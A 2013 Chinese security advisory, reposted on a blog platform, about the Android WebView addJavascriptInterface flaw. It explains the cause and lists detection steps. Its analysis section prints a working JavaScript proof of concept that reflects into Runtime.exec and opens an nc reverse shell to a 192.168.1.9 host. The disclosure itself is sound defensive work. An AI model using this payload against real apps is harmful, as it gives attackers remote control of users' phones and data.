紧急公告:Android系统webview控件接口存安全隐患

日前,谷歌旗下Android系统爆出webview控件存在接口安全隐患,会令绝大部分使用Andorid系统为核心的设备沦为黑客的“玩物”。目前,包括微信、手机QQ、遨游云浏览器等多款Andorid应用已在漏洞报告平台乌云被曝光可以进行手机挂马,当用户打开挂马页面后,手机就会自动执行黑客指令,出现被安装恶意扣费软件、向好友发送欺诈短信、通讯录和短信被窃取等严重后果。

安恒信息提醒开放手机业务的相关企事业单位尽快进行自检修复。

一、webView及addJavaScriptInterface简介: Android SDK中封装了一个webview控件,主要用于控制网页浏览,甚至可以简单的认为是个小型浏览器。其中包含了一个接口函数addJavascriptInterface,通过这个函数能让js代码调用java类对象的一切函数和属性。

二、漏洞分析:

一般在android代码中,这样实现:

settings.setJavaScriptEnabled(true);

settings.setJavaScriptCanOpenWindowsAutomatically(true); mWebView.addJavascriptInterface(new MyClass(), "javaObj");

这个时候可以认为,webview将MyClass类的一个实例化的对象,名字叫javaObj,传递到了js中,js可以通过javaObj对象调用MyClass类的所有方法和属性。

但是设计者没有考虑到,一个后台的类对象可以通过forName()和getMethod()方法获得其他类对象的特定方法,比如下面的代码:

<script> function execute(cmdArgs) { return XXX.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); } execute(["/system/bin/sh","-c","nc 192.168.1.9 8088|/system/bin/sh|nc 192.168.1.9 9999"]); </script>

以上就是漏洞形成的根本原因,可以认为是这个接口函数给了前端页面一个调用后台java代码的机会,并且本意只是让前台调用通过这个接口函数传递过来的java类对象的方法和属性,但是没注意到后台的java类对象能获取如此大的权限以执行除了该对象的方法和属性意外的类的方法。

三、漏洞防护与检测:

1. 通过反编译apk获取smali文件中的代码,或者再通过方便易smali到java文件,检测smali和java文件中的代码,查看手机应用是否存在这个漏洞;

2. 通过检测传入的参数是否存在执行linux命令,或者存在shellcode;

3. 检测手机流量,发现其中是否存在异常流量。

原文发布于微信公众号 - 安恒信息(DBAPP2013)

原文发表时间:2013-09-06

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏编程微刊

2018年各大互联网前端面试题四(美团)

18420
来自专栏小樱的经验随笔

CTF---Web入门第十三题 拐弯抹角

拐弯抹角分值:10 来源: cwk32 难度:易 参与人数:5765人 Get Flag:2089人 答题人数:2143人 解题通过率:97% 如何欺骗服务...

423110
来自专栏岑玉海

RavenDb学习(一)设计模式介绍

RavenDb是一个文档型的数据库,和芒果Db是一个类型的东西,但是公司选择了它,主要是因为它对事务的支持比较好,芒果Db在事务方面有问题。 下面有一个例子...

46770
来自专栏美码师

完美数据迁移-MongoDB Stream的应用

最近微服务架构火的不行,但本质上也只是风口上的一个热点词汇。 作为笔者的经验来说,想要应用一个新的架构需要带来的变革成本是非常高的。

34220
来自专栏Golang语言社区

golang websocket总结(问题贴)

因为工作的需要,接触了websocket,开始的一些很简单的代码,都不知道该怎样运行起来,所以,总是有一层神秘感,却没有太多的兴趣去研究它。不过,还是免不了要了...

43570
来自专栏华章科技

Java 10新特性解密

请注意,本文中所包含的信息在写本文时是准确的。但是到发布时,JDK 10特性组预计将会增加。

9320
来自专栏信安之路

漏洞分析之Typecho二连爆

这段时间 Typecho 在十几天之内连续爆了两个最高可 getshell 的洞,先是 SSRF 可打内网,再是反序列化直接前台 getshell ……安全性这...

22800
来自专栏王清培的专栏

WebAPi的可视化输出模式(RabbitMQ、消息补偿相关)——所有webapi似乎都缺失的一个功能

最近的工作我在做一个有关于消息发送和接受封装工作。大概流程是这样的,消息中间件是采用rabbitmq,为了保证消息的绝对无丢失,我们需要在发送和接受前对消息进行...

26190
来自专栏王清培的专栏

WebAPi的可视化输出模式(RabbitMQ、消息补偿相关)——所有webapi似乎都缺失的一个功能

最近的工作我在做一个有关于消息发送和接受封装工作。大概流程是这样的,消息中间件是采用rabbitmq,为了保证消息的绝对无丢失,我们需要在发送和接受前对消息进行...

12800
来自专栏申龙斌的程序人生

零基础学编程039:生成群文章目录(2)

每个月的月底,“分享与成长群”要汇总所有成员的原创文章,这次我改用了水滴微信平台把数据采集到一个电子表格文件中。在《零基础学编程019:生成群文章目录》这一节里...

30380

扫码关注云+社区

领取腾讯云代金券